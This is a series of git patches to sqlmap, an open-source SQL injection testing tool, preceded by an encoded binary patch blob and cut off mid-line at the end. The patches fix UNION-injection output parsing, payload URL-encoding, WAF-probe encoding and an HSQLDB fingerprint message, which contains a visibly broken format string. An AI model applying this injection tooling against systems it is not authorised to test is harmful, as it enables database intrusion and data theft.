z0YUB^G|s=>kVX{zWY2hzj_LqvBQKa^YQEnbi)1DhB57f~ zSQ((jD`{vWc`R{r#IGPJmSrQBX(P5(C-ArjCQ|fKBW35?$}lm?SY0%F2!~9PnS9mR zWLL@;u`pN^bOb5{V-f9>i(d8dbS4F7r+9fmgo#J*DbOmczrBc|i73i7Y=@j+gxMa+ zmGR0|b*SG!!nm@B!bKPgvaQyd$cRD+ve-8;{&Hb7%`N;MO2-liI?gJv*wu+H^af_2am#)@c+nTm!^TU~<^Nrwn zpXJN1O1{nYAff=2OZc}r7aOmv8h6()yOU>4oG+O;VrJXB6O>@#I8e94Y}7zRL%Rv4 z(eVPW98p{SUoFH;q?7In)Ym#m{|A-1YRRoO$&Cb>nk2OsO$i>wF&OH20l|jCu&-*x zf@xMrA=CL0M2x-i6cHzU=Om^5g5@BbTHU)M5QwO7h>Jb3jkvXcP<7Tnh46{|r7}BJJ1NMNla# zpDe@4vmz)LKt%25VapHmOp)w7nyY*;mOzT?Snx7mq}gys*Y?$?hj1QkW*Iq$EK!&* zlsBueDi3Qi=V+_3fg~kox#PXPioQ%`%;Q8-VvKlkl%cB*RC?@J0I>0lw#y2k8IWi*)Iq^t^u~v>)|2jX)*u}>_lFjN zeqKaw1(%JJ?QC1w-U*Tlr-$kRMB~Y#L6sb7bR^&8uL~pty~8^VFL2v&jUrDW^FEyX zc69gN@>uMdn8@vMPU<7iClCk{TN5d?KtR2R@O)6}yWaa9Va|)&E8GiV%v=y&x#?h! z!i`RqBPtR+N;=q%%(|Jxy4AHv&>EBG1Z=kG*P{R>08GN_e5*vJ*q_{RX-JIj1CKj5 z(D``zL?Esg&IAxgryrKXa0nJiCbLnL^hu4h9gR#fpm;e-gNJZWY|x%81p3ALU5Q56y0qwSh|#QIId1X zS*00MVC}_7jcfG9;N00ohY-9#=+f9aN8DX-mxQ+!s1%qI5!$D3g2yfeNc9{`Ub>)U z`!+aboED)dma@M;>}j{@iQ64z5CW1->FC(seiDkF8r`Ex*D0IsN4)VSkPM5nPLtXa zY7pfGg*GKEOTHqrmdfIp5G$Be%_lO14FkW1yqF8z8xQ%|QWH0%7)=8}NN&2FeXjcL z=)=85Sza}5Z zOlgVc;P(v|?5e;5nTJf3Q4A~g;p|p)CNq!=Ty5RlctfBmu=kT`Ye?Iq>GJEJX;+s^xD6M zTX+BH{3_Ugs|vO*1V@}~gJAPo0B5nf-dPb5Fy6Z=QXUAMB%zY|!I<5gZHFMn6Bb7K z-OkM??O$un)`%Sf_hua_;u#WFHcq(mc6qy+^7nMDBq~^gdI10ixXi8_34+S1T(?sl z$z{zOJgb>@beA}nIxH=0@7WTiu&8JHV48*B#~g9;g}mtJVy831hPS);*l8gPoB~}@ zgOKPNzLd2N4q_i(?)v4_s8MP<&s=g;o@cR_$k!@!p0>rV#Yj%-RMkQ{`|jEbQBtkf z_)^{wjaWCT@7<~BM(@s_+miLu#F}*1?X5-Wk(`!3_Y>N@=i}G4{g8H(vFsVb7#`3O z)0fTlEm0PvI&fl202LI75zqJW^28vu`2{r3ScI<=9ZEJ%IO(IkHYbkrUAIh@{@EC- zAO<$97V#L?Em!G;0k>NPl%=VPPI&+M;W8k!$g3el8`*o>~-Do^P|&h*d$4 zjcY}-mHB-#x8EU|hZQDYE%2dJWTLvq?_*@cF{s!LfsA0U&^JcthuYP_1tyd)AIBNV z19gQ}40=vccU>Recg7E1adHpF%yQ-siNO6$cFaAfaa~lvH=}(OS9;*y@yQVC2JXaN zeAXJeVjWVVk~{)sgx_)F4Vd4$t&a-A4H$<1JBZf!I{L@nEmgNT6!#6TYu zvUH46J6Bdu7Eyd&c+%<+P;v^yIX-~s&^xU_|2TMrZ&zjS^M9oB-uk%XxX^dRVj~-m zb8^?)Z2YkNF9_-&u=i2jy}+U4B=MnZyV+Jq8wBOE|uNjU^;M(M;16akrAO*38*br2^wZCYqb6P>c5uklU%*OnQv)iy1D+F`P zo;J-7sG4_M-eG2CqemZRp*vtxcUl<%*VwDX_J>!9oRcU@>k$^HBjP>mP8DkL*9GT5 zXR*z}Uezfv*i;ztN?BEdxHCXEGSwCS6i|W4tL&`VA zx;RdVNU{4pzO*v`A5J&-Me^yNK&>HBH8k(IzPF|gRB;U1>}PqsR*+vdb=AroS`6b^ zrQ#Y!WY62LlBjQu9}_|LvXu8&+BHs+SI@VVB82W#$u1IBjA$#X7_C2~!l-#>CI%?zl}fr( zfis<#3MwrMvVsLpR8&DUt<*FP0<+%s-WAL!8;KKZ*i)rF;$|?-NCkB78;QR5dgPok zKKA~>CJ@;o8I~-wiY=9yEea`jI_lwxNUpisLRf=SC~y$!2gi;9G+8AN^X$#LWfm8# zd@#nex&)+PJVx!UL=7d}ZVeYmUaC4Nmo_Vjy*If@aa$$kUiCphiwr;>K`Fs5YpF9)+ zoMxhs6Rj0=Z86&0dM8z45teZl1rg>`#*+E#_ zp&t-V2I1sbq9vt|?>*+MxpkO+tm6zfuu+Y};Oo%OoYJRnyl+aEdJa#etFWZ9K!9QoPxw(?50)OovpdB|%`nU>` zmlj>Y=C(Ci6A|CxcVaJo+)5~1Z z{2$@qj4;R4KEu+r7n@EjOJ#)gU5Eu|Q3QEmo6Sj5gOM4t*`y+H>&9eK9? z<>%wD?tupPP-#-?HHHc&C)+hm-GsH50@oU?&vO+KwU8HYOXm8?pysJ>sOjwJhk8j* z)OG8zPyKasjiRom0dc*hpOLG#(<7!84PcAV0Ue~!4UvG|qp_2`y@_2}k; z_2@|i;2{@gx&FT=)1yLnu+Ur-1x5H|xf;gF{bELDS|5}pBy>Mz+5mFQ%y&$(eu!zP z)g2~r+LRNKHs$JPFpV`~sc8{!%X<|7nLDU0sA{>0zb{^kYp5E2`97W#^k5^BR4H7m zrUaa4&!B&<=Y3^`&5mh_l^wY^Q)p>1@vk>;-pmFWYpCkQnUhi#b}fhrJv9!D7=b%s zZR{2n1TPuMi*tP`#fJ=h;wYpBzUZwTL&JQyeh?4CxL5YHGqh5#V1DX{4Cfp~jAds{zwYd?A^fO)KbVlvZt%(VBLr5CfGrBN#|)$j`8E6e}; z(o>NqU6)_~fekep;SF024!%G7RsF*AD$z8-G~?G&AWYj`X}((l92wyt4F=+u_$pj< Z`;sn;AmS(z)KC-tz5dVFKz~)b?%wq+L(c#J literal 4773 zcmV;W5?bvCob5$&3zI6APynS;tu}PQf@?uFAF6R$TMAQ@H9aKxbs(`lR$_Q^7V?!j z(^~=gf(zCT>3KN~p79R}W5u0Dj*hO!oeq^o>}J6Zw6$V2wX%AgwTc)z#o5%NE5=-m zy7TP<*#-{$_^> z#r)^5KmU^V+Jb{c>9u;zVu7e{F2dVu5U1ethCLoC7n6EgX>EO8q3))QJs8+fC~Ilv z+qiS*%V3?l>+$%33v>e=MsK5UV)%ZA(-*%sz7Id8LjVZi1eBftA4G+-M*wc`Xe_v1 z;Ok%VQP#PsVP5}m3@_v;@d|7Sly=kg26t*a7-^#_&Vg`rItc1-$Mtua$atE77g!9Q z^H*jG>C%(Z9~GaY%RYIC4=P=>lJvJ-w4aC*J*YgFr4Jj@)UW>79;)v0!)mI$JbEV^ z;dN?EM6zIhw5l)sA=PxcF&IrQe#-b){kY%&dK^4lSvjEYR-3}tEN&i*)W%uP7@NZ9 zsxP97a1Ngn<+@V7YoB9t`?!dAmk7;kzSWoa#31)F_&eNn9jI{SwbBhi&6+oCS1Nf z-+vwPpVTrPve5srrir+_%E9gG2}aTh3X5^>yY5*y+6djvj*RcRBxB47`wCs&9kY`P zLIT_t>Lrk#!=$$vq!68u-r+X{twiEC1g!*kJcTx0cq2<3faGmcWll9UMZFnfh5c=8 z6jQ`Js~@q4K%$H73vaT1utICAT8r%(sCskQICD4DmNO;6(UaAo{)(SgXbyaLU@Htu z6q2lJ?@;fXminzF5xy7zD#dXLj1%Tr!NJ(Q! z+8zsX^htc9%Xe%IEM!enSlqa27dUWaG>{nr0#UJ>sD>&emAFu?UWw0w3j<{*4?#sx zVw{i6%X{ZA<{E+w-@G#q{s$phNB;rdI}h%e2+82g_#CZ;hNh=$l-fwiV6K+U?iu%4 z2#eSP#t~aZoASPLz}Zk)3E6vGvF;YzF@T3RIcaP#+g;EW#Gio6OB7a-h!C=fHWYUY zs0f~hg*!v8Ccj^CH#JG&20MkoIi*YM6ok6FI1*@VK(!KD>%ks?T#>xnS-^ou022xg z%Y8C42|hbx#aK)0d{4oRhr}DRGH-G?>hOP+o-;I;@bBn-3itxeWf{^Ozi&>Ljv&*l z-9Oz1eBd(*3PC2*ovgFLWdK>5>g=I3!)6Ouu4hcSaMxUjvBO=yk3~NVaiy#uyx83^ zL*%~A0;>dz=Sk+mtSdR6mu{K`0XDpqkOzYo_`Zdkj3|ltBO)yeodm`LkR!1>dIOBu z?qk%f2XQXH#a(WTi#h{4#9W&7$0%;Qn-ZdwOS$O*OWVp?{HhGl1_PkZS&-v-`*RHA zuYd+POBD5EX^2s6h%#II^xHygMU(h9B6hRJZ(>xxSAa>0_>73_Qkoi16r{b~LjY*K zV8rUeNUu3pDO>jTCECyT6(uwO$3d|O&`kwmM~mmjJU2M>1(xczZ!#EcrfNTuIuj!sr>Uw+2+Un6_o)nV zrE@#y_!F|+xEKB^=`3m===&T-?%$H5fHDN3V85U!&4*v*qtvsY>F69=FApBFg3NNy zS&;xWglY&vH>GHK=|9U84TQdw@JF0=PW~g#ETDZ7LCPM&SZHCb4RvvE>n2Sh#+VvtuY=9UU(QCDMRaA3m5B$Jja86O^;20L2T0z0rkQ1E)2s5y#gySS zU32*NP5zR_TPr|@D2_v1>Sj-+6H~Mv!a&>DvSNV$Y{y)h^|P68G^W-%{FXAUcxuR6 z@Q0byd??OcVFzeM@nv{VK9Ekn#q{8E!@%CUTmF0#2x>ywPKW>*tFP@T}n>lzJ6t$`BjWw>mnpu z%z(WlD>FbKS6QD>($9`&TfWbflY@0CHO)LsH>f^p0s;<27#aK^!pj)b$$EtBw>}d5 zlH=#^QwI1YEo(orXwPuN*7n2j*aE{wUqyrr1q+vY4{g#Ay-SPKOxIjEPc3>3b~)Tav8P2{1mrd0TmyJ7|BB(8=M?;mAjcoh2xpwdp`FA2 zRe7J`@NRJk4%opSOovoQBg`I7ho2$O;CF}pWA5khR&n2|nyesxr_bT=46Z0*@881V zLSydX@IG;1;qW{`?-Fr`Mgy6{{bT-ohXh94!{I_>s$<^H;VE$>MI)7fghOm{*sv{dSL zgxbR>3`S^hb=w+RWp{^r1cklAb`bVNU9vEGCh~EwFmefY;gC~1Dq3&aS*RjzCWr@W z5T~rlb(2ViAiY#Hv#jwGX6+t2cY%~s9<|{o&`^-yc8E?vuT^xN4Hzfsf=ZOH;7B4C zepT(Cjy2T-E83igHB<~PsT}tBm8Y!3v#q(vbqlLNa3+Bf-7nM(x|F>i19TxZ^5AL; z=L30YKi_i?{{vCioP*5%7RV!Z&`v_4RM4Y+B5u;<=q`>t-z&tRoyc7K9hi$Rf7)N4 zpBU6$;}wL`<8XchdfNB{c?ts~mk>Mopd`LrSPk)<)1(QpO`JWdEJ5g$i_B!EIN)_V zr{Hl&Je3-(dt`6JB%zJNo>9ovquk2-rqY`4pGy!4*-IPI{cq)+nn@GtPCN7@fnfAo zAdXM{4X6RS8acEx&7lblK-dT=8O2YD0tWk45; zI6pe*yU63I^*dgTdfI$JFo#IwaFXl@bfGw1t-go_9A7u)#esbkgSfWXwi2@9>34_k zKL9+aKG|gQklZ+vv4>kgl9wJS$aMY%!r+O8KlMb=5#V|IU+a>^6!c*=Lap}?%3b5e zpi?-|O&m;^Y?@kM+PGH4EB4p#@X2m!4MHer%}K)U zAqn^@0z9;iB+{hFE^mrqO%pGJLpw=@?sbG8=l5-zdzQvsNX9)uU7%p?- zfbVfNfK!kfR&3ONn*0r_{Xf2m%-uJ9twzvRyQ3eUGfztqgj9xmVgS;=dcVD#<=P$I z%AsI^32)jdbmUve!Q_i0mzCjymE|CUNPg_e!i8Oi?|A+mZ?<6CF`xo{vZk#+$axZK zvgK37geA;0ba6S8Gv>2iNY1;3gy>aa#7o*TotY6yd;9*Q(Tuq^4OLFC+LzIuE zqkSugu0I(svlq&pFmTXXtAsQxUZBbOxy)Z;UA?wHH{Nm4oQ0m}y-|JLi9=TP&IL#03a z30liAFg%`ZRVKbgeG-S0<*)US(>0t^$BoP%^z3C#yT)7aIu{T`W&>i{kdwiyUs%52 z8%FeU7cgu_f6qR<&ofd1XF|h{1SNk+nhw_PXa4|P$7D` zW$<2r2t0Bj{t>qYW5jyl3v{bB3Zy8ctfYUFz$QM7_~koqnHfj)vRSTD}kGbr7_( z9s9CPei8mZyJIRO*qatI*|K#6*>Z*Xg0L+r9WJ$g5uLAB&B^A$%&6>(R(`dM_kp6w z2*w|3+25plwmdelGL9K}vxn>9nu(FBIg+=_K3+FL6w18OhS2u#VzMn+#C;K9sY(^f z+P%T3BMHOGrI(pQvG~%qKPG1~ib8)rMx z_wSlbsN9^6P5N;mEY_IzBsw%wE7!GTn# Date: Thu, 8 Mar 2018 17:44:15 +0100 Subject: [PATCH 055/428] Bug fix (UNION SQLi with --no-escape) --- lib/core/settings.py | 2 +- lib/techniques/union/use.py | 7 ++----- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 8 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 09f5243002f..5c5f4f0bb18 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.9" +VERSION = "1.2.3.10" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/techniques/union/use.py b/lib/techniques/union/use.py index baa42ddd7cd..6be9d4bbc48 100644 --- a/lib/techniques/union/use.py +++ b/lib/techniques/union/use.py @@ -44,6 +44,7 @@ from lib.core.data import queries from lib.core.dicts import FROM_DUMMY_TABLE from lib.core.enums import DBMS +from lib.core.enums import HTTP_HEADER from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapSyntaxException @@ -89,11 +90,7 @@ def _oneShotUnionUse(expression, unpack=True, limited=False): # Parse the returned page to get the exact UNION-based # SQL injection output def _(regex): - return reduce(lambda x, y: x if x is not None else y, (\ - extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ - if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ - None) + return reduce(lambda x, y: x if x is not None else y, (extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), extractRegexResult(regex, removeReflectiveValues(listToStrValue((_ for _ in headers.headers if not _.startswith(HTTP_HEADER.URI)) if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), None) # Automatically patching last char trimming cases if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index db964e74135..7d183aa846c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bcacc60d5d1a2769a667e787eb08b625 lib/core/settings.py +3e4a8bea5a0f5b2f4e1fa0c0c5baf9ee lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -97,7 +97,7 @@ b84d45fc7349caa714f9769b13d70cab lib/techniques/blind/inference.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/__init__.py 1e5532ede194ac9c083891c2f02bca93 lib/techniques/union/__init__.py e58ab8029ffb2cc37e42d68747c4da39 lib/techniques/union/test.py -6c3c4c7d43ad75e61a73184323a81eac lib/techniques/union/use.py +ac67ebbabd06bf9853befc65ad49679e lib/techniques/union/use.py e4146464cf968d4015a52cb8c10e3da5 lib/utils/api.py 37dfb641358669f62c2acedff241348b lib/utils/brute.py a34c4fd2e7d78c5dfdd9eeccb079fb1c lib/utils/crawler.py From 9ad32864ecb70d1838f9f0479b253d5b8facdf07 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 02:15:17 +0100 Subject: [PATCH 056/428] Fixes #2973 --- lib/core/settings.py | 2 +- thirdparty/colorama/winterm.py | 4 ++++ txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 5c5f4f0bb18..d8e696cd3b5 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.10" +VERSION = "1.2.3.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/thirdparty/colorama/winterm.py b/thirdparty/colorama/winterm.py index 60309d3c07a..b7c2404b74b 100644 --- a/thirdparty/colorama/winterm.py +++ b/thirdparty/colorama/winterm.py @@ -128,6 +128,8 @@ def erase_screen(self, mode=0, on_stderr=False): elif mode == 2: from_coord = win32.COORD(0, 0) cells_to_erase = cells_in_screen + else: + return # fill the entire screen with blanks win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) # now set the buffer's attributes accordingly @@ -153,6 +155,8 @@ def erase_line(self, mode=0, on_stderr=False): elif mode == 2: from_coord = win32.COORD(0, csbi.dwCursorPosition.Y) cells_to_erase = csbi.dwSize.X + else: + return # fill the entire screen with blanks win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) # now set the buffer's attributes accordingly diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7d183aa846c..c29f549b3ed 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3e4a8bea5a0f5b2f4e1fa0c0c5baf9ee lib/core/settings.py +8cf22f36f6449f4cc5fea234a9a02cbe lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -333,7 +333,7 @@ bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py -c690e140157d0caac5824c73688231b3 thirdparty/colorama/winterm.py +cdd682cbf77137ef4253b77a95ed9bd8 thirdparty/colorama/winterm.py be7eac2e6cfb45c5e297ec5eee66e747 thirdparty/fcrypt/fcrypt.py e00542d22ffa8d8ac894c210f38454be thirdparty/fcrypt/__init__.py 2f94ddd6ada38e4091e819568e7c4b7c thirdparty/gprof2dot/gprof2dot.py From 24cefeaee2cdf121251e792a5214d4ea8a61d849 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 02:20:22 +0100 Subject: [PATCH 057/428] Minor notification update --- lib/core/settings.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 5 ++++- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index d8e696cd3b5..b27ea17eae8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.11" +VERSION = "1.2.3.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index cab68f15e64..33a644c3270 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -125,9 +125,12 @@ def checkDbms(self): return True else: - warnMsg = "the back-end DBMS is not %s or version is < 1.7.2" % DBMS.HSQLDB + warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB logger.warn(warnMsg) + dbgMsg = "...or version is < 1.7.2" % DBMS.HSQLDB + logger.debug(dbgMsg) + return False def getHostname(self): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c29f549b3ed..a69be5df920 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -8cf22f36f6449f4cc5fea234a9a02cbe lib/core/settings.py +73907fd758301e42c53a71c82ca52bd2 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -140,7 +140,7 @@ c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 61225f674e64bc6eafea140c4cf93deb plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py -b207e728934f768732852c1928c38483 plugins/dbms/hsqldb/fingerprint.py +bc8bc5d69cb720fb5dc23af490c7c11c plugins/dbms/hsqldb/fingerprint.py fd369161778d6b48d7f1f7fc14dcdb5c plugins/dbms/hsqldb/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/hsqldb/syntax.py 7c0535736215ca612756cf589adb249b plugins/dbms/hsqldb/takeover.py From 11b52c85e15e06a3104d25f12e509da093f501cd Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 02:46:37 +0100 Subject: [PATCH 058/428] Patch of bug introduced with 76905e8728a03b1fabd0514fd15a3ca9108e8fc2 --- lib/core/settings.py | 2 +- lib/request/connect.py | 6 +++--- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index b27ea17eae8..a8cfa524428 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.12" +VERSION = "1.2.3.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 1a176f19ae4..344a093d678 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -861,9 +861,9 @@ def queryPage(value=None, place=None, content=False, getRatioValue=False, silent skip = True if not skip: - spaceplus = kb.postSpaceToPlus and place in (PLACE.POST, PLACE.CUSTOM_POST) - value = urlencode(value, spaceplus=spaceplus) - payload = urlencode(payload, safe='%', spaceplus=spaceplus) + if place in (PLACE.POST, PLACE.CUSTOM_POST): # potential problems in other cases (e.g. URL encoding of whole URI - including path) + value = urlencode(value, spaceplus=kb.postSpaceToPlus) + payload = urlencode(payload, safe='%', spaceplus=kb.postSpaceToPlus) value = agent.replacePayload(value, payload) postUrlEncode = False diff --git a/txt/checksum.md5 b/txt/checksum.md5 index a69be5df920..79bfd5a0c87 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -73907fd758301e42c53a71c82ca52bd2 lib/core/settings.py +d1c712d9027dab90b8aa46bf801d0f35 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py @@ -68,7 +68,7 @@ fb2e2f05dde98caeac6ccf3e67192177 lib/parse/configfile.py 4e60fe7c94bbfa631087ed3426df8ef0 lib/request/basicauthhandler.py eb39d5cbd69a2238e2f4ea2fde183cdb lib/request/basic.py c0cabedead14b8a23353b606672cff42 lib/request/comparison.py -f6a31eaa50907b724c25ead5a6fe7161 lib/request/connect.py +9b31df4b00b1709948e7f0568d69d7de lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py a1436e4e4f9b636cb8332f00b686bfd5 lib/request/httpshandler.py From 4cefff7e983854bf993fd54a9db1c807a168793d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 03:13:33 +0100 Subject: [PATCH 059/428] Bug fix (misencoding inside check waf payload) --- lib/controller/checks.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index ff238e9783c..96f8908e0de 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1333,7 +1333,7 @@ def checkWaf(): payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD) value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER - value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload)) + value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) pushValue(conf.timeout) conf.timeout = IDS_WAF_CHECK_TIMEOUT diff --git a/lib/core/settings.py b/lib/core/settings.py index a8cfa524428..72bbce430d9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.3.13" +VERSION = "1.2.3.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 79bfd5a0c87..6e21bf0e1c2 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ c88d66597f4aab719bde4542b0a1a6e0 extra/shutils/regressiontest.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 0f581182871148b0456a691ae85b04c0 lib/controller/action.py -a4605691d340fd05d4bfe7dde922da92 lib/controller/checks.py +5132e59761d8bb617412d2aaaf987716 lib/controller/checks.py 9fbd66da9b5cf58bbb8474ccf9252bb7 lib/controller/controller.py a7b0c8e5a18a3abe8803999dcfc4664f lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -46,7 +46,7 @@ ffa5f01f39b17c8d73423acca6cfe86a lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -d1c712d9027dab90b8aa46bf801d0f35 lib/core/settings.py +b7e3ed2ba524c6b532fcc13025bd7dc3 lib/core/settings.py d0adc28a38e43a787df4471f7f027413 lib/core/shell.py 63491be462c515a1a3880c27c2acc4a2 lib/core/subprocessng.py 3cc852f927833895361973fbcfd156d2 lib/core/target.py From 5380e8174b93caede72123250ad9d6b676e5a60c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sun, 11 Mar 2018 03:20:33 +0100 Subject: [PATCH 060/428] Safer WAF heuristics in case of URI injections --- lib/controller/checks.py | 11 ++++++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 11 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index 96f8908e0de..26fcb4f3c11 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -1332,14 +1332,19 @@ def checkWaf(): retVal = False payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD) - value = "" if not 